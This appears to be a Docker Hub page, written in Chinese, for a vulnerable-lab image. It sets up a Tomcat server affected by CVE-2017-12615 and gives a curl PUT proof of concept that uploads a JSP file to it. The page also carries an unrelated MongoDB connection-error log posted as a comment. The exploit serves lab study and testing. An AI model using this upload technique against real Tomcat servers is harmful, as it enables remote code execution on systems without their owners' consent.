Public | Automated Build

Last pushed: 4 days ago
Short Description
收集各种漏洞环境(Various vulnerability environment)与安全工具
Full Description

Tomcat 远程代码执行漏洞 (CVE-2017-12615)

漏洞信息

获取环境:

  1. 拉取镜像到本地

    $ docker pull medicean/vulapps:t_tomcat_1
    
  2. 启动环境

    $ docker run -d -p 8080:8080 medicean/vulapps:t_tomcat_1
    

    -p 8080:8080 前面的 8080 代表物理机的端口,可随意指定。

使用与利用

访问 http://你的 IP 地址:端口号/

PoC

  1. 向目标发起 PUT 请求,注意后缀为 .jsp/
$ curl -X PUT "http://127.0.0.1:8080/123.jsp/" -d '<%out.println("test");%>'
  1. 然后访问目标地址 http://127.0.0.1:8080/123.jsp, 即可看到输出了 test

参考链接

Docker Pull Command
Owner
medicean
Source Repository

Comments (1)
hiw0rld
9 months ago

MongoDB shell version v3.4.0
connecting to: mongodb://127.0.0.1:65521/xunfeng
2016-12-26T21:30:17.814+0800 W NETWORK [main] Failed to connect to 127.0.0.1:65521, reason: Connection refused
2016-12-26T21:30:17.814+0800 E QUERY [main] Error: couldn't connect to server 127.0.0.1:65521, connection attempt failed :